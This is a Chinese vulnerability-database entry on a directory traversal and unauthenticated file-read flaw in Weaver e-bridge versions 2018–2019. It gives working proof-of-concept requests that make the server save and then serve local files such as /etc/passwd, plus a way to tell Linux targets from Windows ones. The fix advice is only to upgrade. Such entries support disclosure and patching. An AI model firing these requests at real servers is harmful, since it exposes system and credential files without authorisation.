泛微云桥e-bridge 目录遍历文件读取漏洞


title: ‘泛微云桥e-bridge 目录遍历/文件读取漏洞’
date: Mon, 21 Sep 2020 01:12:13 +0000
draft: false
tags: [‘白阁-漏洞库’]

#### 漏洞信息:

泛微云桥是一个为了满足用户提出的阿里钉钉与泛微OA集成需泛微0A云桥e-bridge 其 /wxjsapi/saveYZJFile 接口可以读取文件内容并保存,而后可通过/file/fileNoLogin/{id},读取文件内容。

#### 影响范围:

主要影响 2018-2019 版本

#### 漏洞复现:

如果使用POC回显**`”无法验证您的身份!”`**证明改漏洞已被修复
**POC中,当downloadUrl的路径为文件夹的时候结果为目录遍历 linux windows 通用**
Windows POC:

“`html
/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///C:/&fileExt=txt #查看页面中的id值
“`

![img](/static/baige/01-CMS漏洞/泛微/泛微云桥e-bridge 目录遍历文件读取漏洞/1913098-20201121233209437-1297218164.png)

“`
/file/fileNoLogin/ #访问文件接口,根据上一步获取的id对文件内容进行读取
“`

![img](/static/baige/01-CMS漏洞/泛微/泛微云桥e-bridge 目录遍历文件读取漏洞/1913098-20201121233253572-1802764402.png)

如果提示`msg “/C: (No such file or directory)” `就表示为Linux系统(表示不存在C盘)
Linux POC:

“`html
/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///etc/passwd&fileExt=txt
/file/fileNoLogin/ #访问文件接口,根据上一步获取的id对文件内容进行读取
“`

### 04 实例

Linux系统主目录(根目录)
![img](/static/baige/01-CMS漏洞/泛微/泛微云桥e-bridge 目录遍历文件读取漏洞/1913098-20201121234212131-625392001.png)
Linux中/ect/passwd文件
![img](/static/baige/01-CMS漏洞/泛微/泛微云桥e-bridge 目录遍历文件读取漏洞/1913098-20201121234407372-1517558070.png)

#### 修复方案:

尽快升级到最新版本

© 版权声明
THE END
喜欢就支持一下吧
点赞0赞赏 分享
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容